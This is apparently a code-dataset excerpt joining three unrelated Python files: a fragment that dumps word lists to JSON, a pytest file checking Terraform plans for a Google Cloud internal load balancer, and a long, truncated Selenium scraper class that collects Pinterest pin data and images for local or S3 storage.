dumpJSON(syllables, SYLLABLES)
stopWords = bagOfStopWords()
stopWords = convertToDict(stopWords)
dumpJSON(stopWords, STOPWORDS)
adj, nouns, verbs = bagOfPOS()
adj = convertToDict(adj)
nouns = convertToDict(nouns)
verbs = convertToDict(verbs)
dumpJSON(adj, ADJECTIVES)
dumpJSON(nouns, NOUNS)
dumpJSON(verbs, VERBS)
|
StarcoderdataPython
|
66406
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
_BACKENDS = '[{balancing_mode="CONNECTION", group="foo", failover=false}]'
def test_defaults(plan_runner):
"Test variable defaults."
_, resources = plan_runner(FIXTURES_DIR, backends=_BACKENDS)
assert len(resources) == 3
resources = dict((r['type'], r['values']) for r in resources)
fwd_rule = resources['google_compute_forwarding_rule']
assert fwd_rule['load_balancing_scheme'] == 'INTERNAL'
assert fwd_rule['all_ports']
assert fwd_rule['allow_global_access'] is None
backend = resources['google_compute_region_backend_service']
assert len(backend['backend']) == 1
assert backend['backend'][0]['group'] == 'foo'
health_check = resources['google_compute_health_check']
for k, v in health_check.items():
if k == 'http_health_check':
assert len(v) == 1
assert v[0]['port_specification'] == 'USE_SERVING_PORT'
elif k.endswith('_health_check'):
assert len(v) == 0
def test_forwarding_rule(plan_runner):
"Test forwarding rule variables."
_, resources = plan_runner(
FIXTURES_DIR, backends=_BACKENDS, global_access='true', ports="[80]")
assert len(resources) == 3
values = [r['values'] for r in resources if r['type']
== 'google_compute_forwarding_rule'][0]
assert not values['all_ports']
assert values['ports'] == ['80']
assert values['allow_global_access']
|
StarcoderdataPython
|
3284424
|
<reponame>BlairMar/Pintrest-webscraping-project
from typing import Union, List, Set
from pandas.core.frame import DataFrame
from selenium import webdriver
from time import sleep
import urllib.request
import os
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
import json
from sqlalchemy.engine.base import Engine
# from webdriver_manager.chrome import ChromeDriverManager
import boto3
from tqdm import tqdm
import shutil
import uuid
import re
import pandas as pd
from sqlalchemy import create_engine
import sys
from selenium.webdriver.chrome.options import Options
''' Defines a class to perform webscraping for the pinterest website. '''
class PinterestScraper:
def __init__(self, root: str) -> None:
''' Initialise the attributes of the class
Arguments
---------
root: str (The main page which contains a list of all the available categories.)
Attributes
---------
category: str \n
root: str \n
driver: webdriver object \n
link_set: set \n
log: set \n
s3_list: list \n
current_dict: dict \n
main_dict: dict \n
counter_dict: dict \n
cat_imgs_to_save: dict \n
s3_client: boto3.client(s3) \n
xpath_dict: dict \n
Returns
---------
None '''
self._category = None # Holds the value whatever category we are currently on.
self._root = root # The root URL.
chrome_options = Options()
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--allow-running-insecure-content')
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-dev-shm-usage')
self._driver = webdriver.Chrome(options=chrome_options)
# self._driver = webdriver.Chrome(ChromeDriverManager().install())
self._link_set = set() # A set to store previously visited pages' hrefs.
self._log = set() # A set used to load previously visisted pages' hrefs upon a rerun.
self._s3_list = [] # A list used to store the names of categories which are to be saved to an s3 bucket.
self._current_dict = {} # A dictionary to store data for each individual image page.
self._main_dict = {} # A dictionary to store data for entire categories.
self._counter_dict = {} # A dictionary to define the start point for each category on subsequent runs.
self._cat_imgs_to_save = {} # A dictionary which store which categories to download images for on a given run.
self._s3_client = boto3.client('s3') # S3 client to connect to AWS S3.
self._xpath_dict = { # A dictionary to store xpaths to various page elements.
'official_user_container': '//div[@data-test-id="official-user-attribution"]',
'official_user_element': './/div[@class="tBJ dyH iFc yTZ pBj zDA IZT mWe CKL"]',
'non_off_user_container': '//div[@data-test-id="user-rep"]',
'non_off_user_element': './/div[@class="tBJ dyH iFc yTZ pBj zDA IZT mWe"]',
'follower_element': './/div[@class="tBJ dyH iFc yTZ pBj zDA IZT swG"]',
'tag_container': '//div[@data-test-id="CloseupDetails"]',
'story_tag_container': '//div[@data-test-id="CloseupMainPin"]',
'tag_vase_carousel': '//div[@data-test-id="vase-carousel"]',
'tag_link': './/div[@data-test-id="vase-tag"]//a',
'reg_title_element': '//div[@data-test-id="CloseupDetails"]//div[@data-test-id="pinTitle"]/h1/div',
'h1_title_element': '//div[@data-test-id="CloseupMainPin"]//h1',
'desc_container': '//div[@data-test-id="CloseupDetails"]//div[@data-test-id="CloseupDescriptionContainer"]',
'desc_element': './/span[@class="tBJ dyH iFc yTZ pBj zDA IZT swG"]',
'links_container': '//div[@data-test-id="grid"]//div[@class="vbI XiG"]',
'links_element': './/div[@class="Yl- MIw Hb7"]/div/div/div/div[1]/a',
'categories_container': '//div[@data-test-id="interestRepContainer"]',
'pin_closeup_image': '//div[@data-test-id="pin-closeup-image"]//img',
'story_pin_image': '//div[@aria-label="Story Pin image"]',
'story_pin_video': '//div[@data-test-id="story-pin-closeup"]//video',
'story_pin_multi_video': '//div[@data-test-id="story-pin-closeup"]//video',
'close_up_details': '//div[@data-test-id="CloseupDetails"]'
}
self._driver.get(self._root) # Opens the root URL.
self._argsv = sys.argv
def _get_category_links(self, categories_xpath: str) -> dict:
''' Defines a fucntion which extracts the href attribute
of each category on the root URL page.
Arguments
---------
categories_xpath: str (The xpath to the web element containing the container for the category page links.)
Returns
---------
dict (A dictionary containing the href for each category.) '''
# Get the a list of all the categories on the root.
try:
# Wait until the presence of desired element is located or 2 seconds pass.
container = WebDriverWait(self._driver, 2).until(
EC.presence_of_element_located((By.XPATH, categories_xpath))
)
categories = container.find_elements_by_xpath('.//a')
# Extract the href.
return {i+1:link.get_attribute('href') for i, link in enumerate(categories)}
except KeyboardInterrupt:
raise KeyboardInterrupt
def _print_options(self, category_link_dict: dict) -> None:
''' Defines a function which prints all of the available categories
on the root URL page.
Arguments
---------
category_link_dict: dict (A dictionary containing the hrefs to each category presented on the root page.)
Returns
---------
None '''
try:
print(f"\n The options (Total {len(category_link_dict)}) are:")
# Print all categories available on the root page.
for idx, category in category_link_dict.items():
print(f"\t {idx}: {category.replace(self._root, '').split('/')[0]}")
except KeyboardInterrupt:
raise KeyboardInterrupt
def _categories_to_save_imgs(self, selected_category_names: list) -> None:
''' Defines a function which asks the user which categories they would like to download images for.
These categories are then saved to cat_images_to_save as either True, to be downloaded, or False,
which are not downloaded.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None'''
try:
# Ask the user if they would like to download any images at all.
get_any = ''
while get_any != 'N' and get_any != 'Y':
get_any = self._argsv[3].upper()
# If yes, ask them which categories they would like to download images for.
if get_any == 'Y':
# Create the start of an input check list to ensure correct input is obtained.
print('A = All categories: ')
download_check = ['A']
# Add an option for each category that has been selected to grab data for.
for index, category in enumerate(selected_category_names):
print(f'{index + 1} = {category}')
download_check.append(str(index + 1))
while True:
# Ask which categories they would like to download images for.
try:
downloads = self._argsv[4].upper()
# Split the string input into a list of inputs.
downloads = (downloads.replace(' ', '')).split(',')
# Create an empty list to append inputs to, to ensure no repeated inputs.
repeat_check = []
for option in downloads:
# Append each input in to the repeat check list.
repeat_check.append(option)
# Ensure that the input is acceptable.
assert option in download_check
# Check that no repeats were in the user input.
assert len(repeat_check) == len(set(repeat_check))
# If the user wants to download all images.
if 'A' in downloads:
for cat_name in selected_category_names:
self._cat_imgs_to_save[cat_name] = True
else:
# If they don't want to download images for all categories.
for option in downloads:
self._cat_imgs_to_save[selected_category_names[int(option) - 1]] = True
# Ensure dictionary is update even for categories the user doesn't want to download.
for name in selected_category_names:
if name not in self._cat_imgs_to_save.keys():
self._cat_imgs_to_save[name] = False
# Print what the user has chosen to download images for (if any).
print_list = [key for key, value in self._cat_imgs_to_save.items() if value == True]
print(f'\nDownloading images for {print_list}')
break
except KeyboardInterrupt:
raise KeyboardInterrupt
# If the user input did not fulfill the parameters set above.
except:
print('\nPlease only select options from the provided list. No duplicates. ')
# If they user does not want to download any images.
elif get_any == 'N':
print('\nNo images will be downloaded. ')
for cat_name in selected_category_names:
self._cat_imgs_to_save[cat_name] = False
# If they user did not choose Y or N.
else:
print('\nNot a supported input. Please retry: ')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _get_user_input(self, category_link_dict: dict) -> tuple:
''' Defines a function which asks the user how many and which categories
to download.
Arguments
---------
category_link_dict: dict (A dictionary containing the hrefs to each category presented on the root page.)
Returns
---------
selected_category_names: list (A list of all categories selected by the user for the current run.) \n
selected_category: dict (A dictionary of the categories in the current run as values to indexed keys.) '''
# Ask the user how many of the printed categories they would like to grab data for.
try:
while True:
try:
categories_num = int(self._argsv[1])
# Ensure a valid answer.
assert 0 < categories_num <= len(category_link_dict)
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
print(f"\nInvalid input, try again.")
selected_category = {}
# If chosen number == max amount.
if categories_num == len(category_link_dict):
# Set empty dict to dict of full categories available for selection.
selected_category = category_link_dict
else:
try:
choices = []
# Create a list of numbers 1 through total number of categories available.
check_list = [str(x+1) for x in range(len(category_link_dict))]
# Have user select what categories they want data for if not all categories.
while len(choices) != categories_num:
choices = self._argsv[2]
# Turn user input into correct list format.
choices = (choices.replace(' ', '')).split(',')
# Print out the users choices.
print(choices)
# Check the validity of each input in the users list.
for choice in choices:
# If the input is not valid, restart the loop.
if choice not in check_list:
choices = []
print(f'\nPlease only enter integers in a comma separated \
list. Values between 1 and {len(category_link_dict)}: ')
break
# Ensure a choice is made.
if len(choices) == 0:
continue
# Ensure the number of choices match the number of categories user previously requested.
elif len(choices) != categories_num:
print('\nPlease only select the predetermined number of choices. ')
# Ensure that only unique inputs are allowed.
elif len(set(choices)) != len(choices):
print('\nOnly unique categories accepted. ')
choices = []
# If requirements are met, add the category name as the value to a Key of 1 -> number of selected categories.
elif len(set(choices)) == len(choices) == categories_num:
for i, choice in enumerate(choices):
choice = int(choice)
selected_category[i+1] = category_link_dict[choice]
else:
print('\nUnknown choice error')
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
raise Exception(f"\nChoice error 2")
# Create a list of category names without the /*numberstring following the name.
selected_category_names = [category.split('/')[4] for category in selected_category.values()]
print(f"Categories selected: {selected_category_names}")
return selected_category_names, selected_category
except KeyboardInterrupt:
raise KeyboardInterrupt
def create_RDS(self) -> None:
''' Defines a function which asks the user if they would like to create an RDS.
If the user says yes, asks whether the RDS should be local or remote.
Arguments
---------
None
Returns
---------
None '''
try:
# Ask the user if they would like to create an RDS.
valid = False
while not valid:
rds_answer = self._argsv[11].upper()
if rds_answer == 'Y' or rds_answer == 'N':
# Answer is valid, stop the loop.
valid = True
if rds_answer == 'Y':
print('Creating RDS...')
# Ask whether to create/update tables on AWS RDS or local RDS.
remote_RDS = self._argsv[12].upper()
# Create/update remote RDS.
if remote_RDS == 'Y':
self._json_to_rds('../data/', True)
# Create/update local RDS.
elif remote_RDS == 'N':
self._json_to_rds('../data/', False)
else:
print('Invalid answer')
else:
print('Data will not be saved in an RDS...')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _interior_cloud_save_loop(self, remote: str, selected_category_names: list) -> Union[None, str]:
''' Defines a the interior loop of the overall cloud save function. Interior loop is designed and
intergrated so that the first question of the full loop is only asked once if an error is made when
typing the name of the desired s3 bucket.
Arguments
---------
remote: str (Y or N or other use input from the exterior function '_save_to_cloud_or_local'.) \n
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
str ('retry' or '' depending on where the loop is broken to pass this back to the external function.) \n
None (If the loop is broken somewhere where a str is not returned.) '''
try:
# If user wants to save data to an S3 bucket, gets the name of the bucket.
if remote == 'Y':
self.s3_bucket = self._argsv[6]
# Shows the user the input to check that there are no mistakes in their entry. Asks to continue.
go_on = ''
while go_on != 'Y' and go_on != 'N':
go_on = self._argsv[7].upper()
# If they user is happy with their entry.
if go_on == 'Y':
# Creates a printed list and a check list for the user's next input.
print('A = All categories: ')
upload_check = ['A']
for index, category in enumerate(selected_category_names):
print(f'{index + 1} = {category}')
upload_check.append(str(index + 1))
while True:
try:
# Asks the user what categories they wopuld like to download to the S3 bucket.
all_or_some = self._argsv[8].upper()
# Turns the input into a valid list.
all_or_some = (all_or_some.replace(' ', '')).split(',')
# Shows the user their choices.
print(all_or_some)
# Creates an empty list to append to in order to check for repeat inputs from the user.
repeat_check = []
for option in all_or_some:
# Append each input in the user's list to the repeat check.
repeat_check.append(option)
# Ensure input is valid.
assert option in upload_check
# Ensure no repeats.
assert len(repeat_check) == len(set(repeat_check))
# If they user wants to upload everything to S3. Creates a list of all current run categories.
if 'A' in all_or_some:
self._s3_list = selected_category_names
# If the user only wants specific categories to be uploaded to S3.
else:
# Creates a list of selected categories.
for option in all_or_some:
self._s3_list.append(selected_category_names[int(option) - 1])
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
print('\nPlease only select options from the provided list. No duplicates. ')
# If the user made a mistake when entering their bucket or wants to change bucket.
elif go_on == 'N':
print('\nPlease re-enter the name of your bucket. ')
# Returns to the exterior script a string which in turn will repeat the above code.
return 'retry'
# If the user doesn't want to upload anything to S3 move on with the script.
elif remote == 'N':
print('\nAll data will be stored on your local machine. ')
else:
print('\nYour selection was not valid, please choose again. ')
return ''
except KeyboardInterrupt:
raise KeyboardInterrupt
def _save_to_cloud_or_local(self, selected_category_names: list) -> None:
''' Defines a function which asks if the user wants to upload any data/images to an S3 bucket.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
remote = ''
# Asks if the user wants to upload anything to S3.
while remote != 'N' and remote != 'Y':
# If this is the first time running the function, or they made an inccorect entry last time.
if remote == '':
remote = self._argsv[5].upper()
# Go to the interior loop.
remote = self._interior_cloud_save_loop(remote, selected_category_names)
# If the interior loop was completed successfully.
if remote == None:
break
# If the user made a mistake in entering the name of their bucket.
elif remote == 'retry':
remote = 'Y'
# Go back to the interior loop without repeating the first part of this function.
remote = self._interior_cloud_save_loop(remote, selected_category_names)
# If the interior loop was completed successfully.
if remote == None:
break
else:
print('\nLoop structure error. Luke you stupid...')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _initialise_local_folders(self, directory_path: str, selected_category_names: list) -> None:
''' Defines a function which initialises folders for local saves.
Arguments
---------
directory_path: str (A str indicating the location of the folder containing the src folder this file runs from.) \n
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
None '''
try:
# Assign the directory path to attribute for later use.
self._root_save_path = directory_path
print(f"\nCreating folders. ")
for category in selected_category_names:
# Creates a folder named data to store a folder for each category
if not os.path.exists(f'{self._root_save_path}'):
os.makedirs(f'{self._root_save_path}')
# Initialises a key with an empty dictionary value for each category in the current run for the main dictionary.
self._main_dict[f"{category}"] = {}
# Makes a temporary storage folder for every category in the current run.
os.makedirs(f'{self._root_save_path}/temp_{category}')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _initialise_counter(self, selected_category_names: list) -> dict:
''' Defines a function which initialises the counter dictionary.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
dict (The counter dictionary this function initialises.) '''
try:
# Initialises the count for each category in current run.
for category in selected_category_names:
self._counter_dict[f'{category}'] = 0
return self._counter_dict
except KeyboardInterrupt:
raise KeyboardInterrupt
def _check_for_logs(self, selected_category_names: list) -> Union[str, None]:
''' Defines a function which checks for data relating to a previous run of this script.
If the logs are found, use these to initialise the scraper dictionaries if the current
categories relate at all to the previous save data.
Arguments
---------
selected_category_names: list (A list of all categories selected by the user for the current run.)
Returns
---------
fresh: Union[str, None] ('Y' or 'N' if previous save data is detected and the user chooses so. \
None if no data relates to current run.) '''
try:
# If there is has been a previous run and the logs are still on the system.
if os.path.exists('../data/recent-save-log.json'):
# Loads the log regarding location of save data.
with open('../data/recent-save-log.json', 'r') as load:
recent_saves = json.load(load)
# Gets the categories relating to the current run from the save data.
saves = [key for key in recent_saves if key in selected_category_names]
# Loads the log regarding web pages already visited as to not repeat data collection.
with open('../data/log.json', 'r') as load:
contents = json.load(load)
# Save data in log is saved as the href collected and the related category.
tuples_content = [(item[0], item[1]) for item in contents]
# If any data relates to current run print which categories they are.
if saves:
print(f'\nWe have detected saved data for the follow categories: {saves}. ')
fresh = ''
# Asks the user if they would like to append to existing data to start afresh.
while fresh != 'Y' and fresh != 'N':
fresh = self._argsv[9].upper()
# If user wants to append, update link set and log with the hrefs previously visited.
if fresh == 'Y':
self._link_set = set(tuples_content)
self._log = set(tuples_content)
# Increase the counter dictionary for each category to the correct starting point.
for cat, href in tuples_content:
category = cat.split('/')[0]
if category in selected_category_names:
self._counter_dict[category] += 1
for save in saves:
# If a category has a local save file, load the associated json data into the main dictionary.
if recent_saves[save] == 'local':
with open(f'../data/{save}/{save}.json', 'r') as load:
self._main_dict[f'{save}'] = json.load(load)
# If a category has a remote save file, load the associated json data into the main dictionary.
elif recent_saves[save][0] == 'remote':
obj = self._s3_client.get_object(
Bucket = recent_saves[save][1],
Key = (f'pinterest/{save}/{save}.json')
)
self._main_dict[f'{save}'] = json.loads(obj['Body'].read())
else:
print('\nSomething fishy going on with the save_log. ')
# If the user wants to start anew for current run categories, ensure data for categories not in this run
# remains intact while removing data relating to current run categories.
elif fresh == 'N':
tuples_content = [item for item in tuples_content if item[0].split('/')[0] not in saves]
self._link_set = set(tuples_content)
self._log = set(tuples_content)
else:
print('\nPlease re-enter your input. ')
# If there is save data but none relates to current run categories, ensure data is maintained.
else:
self._link_set = set(tuples_content)
self._log = set(tuples_content)
fresh = None
print("\nPrevious saves detected: None relate to this data collection run. ")
# If no previous save data was found.
else:
fresh = None
return fresh
except KeyboardInterrupt:
raise KeyboardInterrupt
def _extract_links(self, container_xpath: str, elements_xpath: str, n_scrolls: int = 1) -> None:
''' Defines a function which scrolls through the page relating to every category in the current run.
With each scroll it grabs the href of each image page that it finds and appends it to a set of hrefs.
Arguments
---------
container_xpath: str (The xpath for the web element which contains all the images on the page being scraped.) \n
elements_xpath: str (The xpath regarding the <a> tags which contain the hrefs the method gaathers.) \n
n_scrolls: int (The number of times a user wishes to scroll down each category page.)
Returns
---------
None '''
try:
# Opens the page for a category.
self._driver.get(self._root + self._category)
# Sets the maximum amount of pixels allowed for one scroll.
Y = 10**6
sleep(2)
# Keep scrolling down teh specified number of times.
for _ in range(n_scrolls):
# Scrolls down the page.
self._driver.execute_script(f"window.scrollTo(0, {Y})")
sleep(1)
try:
# Stores the href to each image page if the page contains the desired images.
container = self._driver.find_element_by_xpath(container_xpath)
link_list = container.find_elements_by_xpath(elements_xpath)
# Displays the images grabbed in a specific scroll.
print(f"\nNumber of images successfully extracted: {len(link_list)}")
# Appends the hrefs to a set.
self._link_set.update([(self._category, link.get_attribute('href')) for link in link_list])
# Displays the total number of unique hrefs after every scroll.
print(f"\nNumber of images unique to this run: {len(self._link_set) - len(self._log)}")
except:
# If the page contains no images, or there is an error loading image elements on a page, skip the category.
print('\nNo images detected on this page. Moving to next page (if applicable). ')
# Leaves a message in the dictionary to explain why there is no data.
self._main_dict[self._category.split('/')[0]]['Message'] = 'No image data available for this category on this run. \
\nThere may not be any images on this page or there may have been an error.'
break
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_images_src(self, selected_category: dict, n_scrolls: int = 1) -> None:
''' Defines a function which grabs all the hrefs for all the images to be grabbed during the run.
Arguments
---------
selected_category: dict (A dictionary of the categories in the current run as values to indexed keys.) \n
n_scrolls: int (The number of times a user wishes to scroll down each category page.)
Returns
---------
None '''
try:
# Loops through each category and runs extract_links to grab hrefs.
for category in selected_category.values():
self._category = category.replace(self._root, "")
self._extract_links(self._xpath_dict['links_container'],
self._xpath_dict['links_element'],
n_scrolls)
except KeyboardInterrupt:
raise KeyboardInterrupt
def _generate_unique_id(self) -> None:
''' Defines a function which generates a unique ID (uuid4) for every image page
that is scraped by the scraper.
Arguments
---------
None
Returns
---------
None '''
try:
# Generates a uuid4.
self._current_dict['unique_id'] = str(uuid.uuid4())
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_title(self, title_element: str) -> None:
''' Defines a function that grabs the title from a Pinterest page and adds it to the key
"title" in self._current_dict.
Arguments
---------
title_element: str (The xpath that leads to the title web element of a given Pinterest page.)
Returns
---------
None '''
try:
# Finds the title web element of a page and assigns it to the dictionary of the current page data.
try:
title_element = self._driver.find_element_by_xpath(title_element)
self._current_dict["title"] = title_element.get_attribute('textContent')
# No title element found.
except:
self._current_dict["title"] = 'No Title Data Available'
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_description(self, desc_container, desc_element) -> None:
''' Defines a function that grabs the description from a Pinterest page and adds it to the key
"description" in self._current_dict.
Arguments
---------
desc_container: str (The xpath for the web element which contains the description section of the page.) \n
desc_element: str (The xpath that leads to the description web element following the container xpath.)
Returns
---------
None '''
try:
# Grabs the container of the description box.
description_container = self._driver.find_element_by_xpath(desc_container)
# Tries to grab the desctiption if it is present. If not, no description available.
try:
description_element = WebDriverWait(description_container, 0.5).until(
EC.presence_of_element_located((By.XPATH, desc_element))
)
self._current_dict["description"] = description_element.get_attribute('textContent')
# No description available.
except:
self._current_dict["description"] = 'No description available'
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_user_and_count(self, dict_container, dict_element) -> None:
''' Defines a function that grabs the poster name and follower count and appends adds them to the keys
"poster_name" and "follower_count" respectively in self._current_dict.
Arguments
---------
dict_container: str (The xpath for the web element which contains the user information section of the page.) \n
dict_element: str (The xpath that leads to the description web element following the container xpath.)
Returns
---------
None '''
try:
try:
# Grabs the poster name and assigns to current dict.
container = self._driver.find_element_by_xpath(dict_container)
poster_element = container.find_element_by_xpath(dict_element)
self._current_dict["poster_name"] = poster_element.get_attribute('textContent')
# Grabs the follower count and assigns to current dict.
follower_element = container.find_elements_by_xpath(self._xpath_dict['follower_element'])
followers = follower_element[-1].get_attribute('textContent')
# If the element has no associated text, there are no followers.
if followers == '':
self._current_dict["follower_count"] = '0'
# Splits the text to only give the number of followers.
else:
self._current_dict["follower_count"] = followers.split()[0]
# If there is an error with the container for the user info update current dict accordingly.
except:
if 'poster_name' not in self._current_dict.keys():
self._current_dict['poster_name'] = 'User Info Error'
if 'follower_count' not in self._current_dict.keys():
self._current_dict['follower_count'] = 'User Info Error'
print('User Info Error')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_tags(self, tag_container) -> None:
''' Defines a function that grabs the tags from a Pinterest page and adds them to the key
"tag_list" in self._current_dict.
Arguments
---------
tag_container: str (The xpath for the web element which contains the tags for the page.)
Returns
---------
None '''
try:
try:
# Waits for the tag container element to appear on the page.
container = WebDriverWait(self._driver, 0.5).until(
EC.presence_of_element_located((By.XPATH, f'{tag_container}{self._xpath_dict["tag_vase_carousel"]}'))
)
# Grabs the text content of each tag on the page.
tag_elements = container.find_elements_by_xpath(self._xpath_dict['tag_link'])
self._current_dict["tag_list"] = [tag.get_attribute('textContent') for tag in tag_elements]
# If no tags are available on the page.
except:
self._current_dict["tag_list"] = 'No Tags Available'
except KeyboardInterrupt:
raise KeyboardInterrupt
def _download_image(self, src: str) -> None:
''' Defines a function that downloads the image on a page to the temp folder for it's respective category.
Arguments
---------
src: str (The src link for the picture being downloaded.)
Returns
---------
None '''
try:
# If the category is one for which the user previously decided they wanted to download images for.
if self._cat_imgs_to_save[self._category]:
# Downloads the image to the appropriate folder.
urllib.request.urlretrieve(src,
f"{self._root_save_path}/temp_{self._category}/{self._category}_{self._counter_dict[self._category]}.jpg")
# If the image is not downloaded enter as such in current dict.
else:
self._current_dict['downloaded'] = False
except KeyboardInterrupt:
raise KeyboardInterrupt
def _is_img_downloaded(self) -> None:
''' Defines a function that appends whether the image has been downloaded or not to the current dict.
Arguments
---------
None
Returns
---------
None '''
try:
# If there is not a key 'downloaded' from the _download_image method then the image has been downloaded.
if 'downloaded' not in self._current_dict.keys():
# Append information as such to the current page dict.
self._current_dict['downloaded'] = True
# If downloaded already exists, image has not been downloaded and has previously been noted as such, so pass.
else:
pass
except KeyboardInterrupt:
raise KeyboardInterrupt
def _save_location_key(self) -> None:
''' Defines a function that appends save location of a categories json file and potential images.
Arguments
---------
None
Returns
---------
None '''
try:
# If the category is to be saved remotely.
if self._category in self._s3_list:
# Append the bucket it will be saved to to the current dict.
self._current_dict['save_location'] = f"S3 bucket: {self.s3_bucket}"
else:
# Else appends a local save.
self._current_dict['save_location'] = f"Local save in /data/{self._category}"
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_image_src(self) -> None:
''' Defines a function that grabs the image src from a Pinterest page and adds it to the key
"image_src" in self._current_dict.
Arguments
---------
None
Returns
---------
None '''
try:
try:
try:
# Waits for element to load as page layout can be determined by what elements load or not.
image_element = WebDriverWait(self._driver, 1).until(
EC.presence_of_element_located((By.XPATH, self._xpath_dict['pin_closeup_image']))
)
self._current_dict["is_image_or_video"] = 'image'
# If the element loads grab the image src.
self._current_dict["image_src"] = image_element.get_attribute('src')
# Download the image if user wants images downloaded for this category.
self._download_image(self._current_dict["image_src"])
# Appends if image has been downloaded or not to the current dict.
self._is_img_downloaded()
# Appends the save location of the image to the current dict.
self._save_location_key()
except:
# If the element didn't load it means that the element is a video and not an image.
video_element = self._driver.find_element_by_xpath('//video')
self._current_dict["is_image_or_video"] = 'video'
# Grab a different web element specifically for videos.
self._current_dict["image_src"] = video_element.get_attribute('poster')
# Download the thumbnail of the video if the user wants images downloaded for this category.
self._download_image(self._current_dict["image_src"])
# Appends if thumbnail has been downloaded or not to the current dict.
self._is_img_downloaded()
# Appends the save location of the thumbnail to the current dict.
self._save_location_key()
except:
# If the nested try loop fails there is a page layout that we have not encountered before, hence the fail.
self._current_dict['downloaded'] = False
self._save_location_key()
print('\nImage grab Error. Possible embedded video (youtube).')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_story_image_srcs(self) -> None:
''' Defines a function that grabs the image src from a Pinterest page that deviates from the usual
page layout and adds it to the key "image_src" in self._current_dict.
Arguments
---------
None
Returns
---------
None '''
try:
try:
try:
# Waits until the image container element is present fails the try statement if it isn't present.
image_container = WebDriverWait(self._driver, 1).until(
EC.presence_of_element_located((By.XPATH, self._xpath_dict['story_pin_image']))
)
# Grabs the src for the image if the correct container was obtained.
image = image_container.get_attribute('style')
if not image:
# If the container didn't have the style attribute then it should have the poster attribute, i.e. a video page.
# Grabs the src for the thumbnail of the video on the page.
self._current_dict["is_image_or_video"] = 'video(story page format)'
video_container = self._driver.find_element_by_xpath(self._xpath_dict['story_pin_video'])
self._current_dict["image_src"] = video_container.get_attribute('poster')
# Downloads the image if the user wants to download images for this category.
self._download_image(self._current_dict["image_src"])
# Checks if the image has been downloaded and updates the currect page dict to save so.
self._is_img_downloaded()
# Appends the save location of the image to the current page dict.
self._save_location_key()
else:
# If the style attribute is found then an image is present on the page.
self._current_dict["is_image_or_video"] = 'image(story page format)'
# The src grabbed earlier is embedded in more text, need to separate the src.
self._current_dict["image_src"] = re.split('\"', image)[1]
# Downloads the image if the user wants to download images for this category.
self._download_image(self._current_dict["image_src"])
# Checks if the image has been downloaded and updates the currect page dict to save so.
self._is_img_downloaded()
# Appends the save location of the image to the current page dict.
self._save_location_key()
except:
# If the element at the start of the function does not load there is a different page format.
# Grabs and appends the src for the first thumbnail of the videos on the page to the current dict.
self._current_dict["is_image_or_video"] = 'multi-video(story page format)'
video_container = self._driver.find_element_by_xpath(self._xpath_dict['story_pin_multi_video'])
self._current_dict["image_src"] = video_container.get_attribute('poster')
# Downloads the image if the user wants to download images for this category.
self._download_image(self._current_dict["image_src"])
# Checks if the image has been downloaded and updates the currect page dict to save so.
self._is_img_downloaded()
# Appends the save location of the image to the current page dict.
self._save_location_key()
except:
# If none of the above elements are present on the page there is some form of page layout unencountered as of yet.
# If the src has been grabbed but there was an error elsewhere, keep the src. If not, upload an error message.
try:
if self._current_dict['image_src']:
pass
except:
self._current_dict['image_src'] = 'Image src error.'
# Appends that the image has not been downloaded
self._current_dict['downloaded'] = False
# Appends the save location of the image to the current page dict.
self._save_location_key()
print('\nStory image grab error.')
except KeyboardInterrupt:
raise KeyboardInterrupt
def _grab_all_users_and_counts(self) -> None:
''' Defines a function that checks if a user is officially recognised or a story. Then runs the appropriate
methods to grab the data based on what type of page layout is present on the page.
Arguments
---------
None
Returns
---------
None '''
try:
# Sees if the page has the layout of an official user account.
if (self._driver.find_elements_by_xpath(self._xpath_dict['official_user_container'])):
# Generates a unique id for the current page dict.
self._generate_unique_id()
# Grabs the title of the page.
self._grab_title(self._xpath_dict['reg_title_element'])
# Grabs the description of the page.
self._grab_description(self._xpath_dict['desc_container'], self._xpath_dict['desc_element'])
# Grabs the user account name and the follower count of the page.
self._grab_user_and_count(
self._xpath_dict['official_user_container'],
self._xpath_dict['official_user_element']
)
# Grabs the tags present on the page.
self._grab_tags(self._xpath_dict['tag_container'])
# Grabs the image src and downloads the image of the page if applicable.
self._grab_image_src()
# Sees if the page has the layout of a non official user account.
elif (self._driver.find_elements_by_xpath(self._xpath_dict['close_up_details'])):
# Generates a unique id for the current page dict.
self._generate_unique_id()
# Grabs the title of the page.
self._grab_title(self._xpath_dict['reg_title_element'])
# Grabs the description of the page.
self._grab_description(self._xpath_dict['desc_container'], self._xpath_dict['desc_element'])
# Grabs the user account name and the follower count of the page.
self._grab_user_and_count(
self._xpath_dict['non_off_user_container'],
self._xpath_dict['non_off_user_element']
)
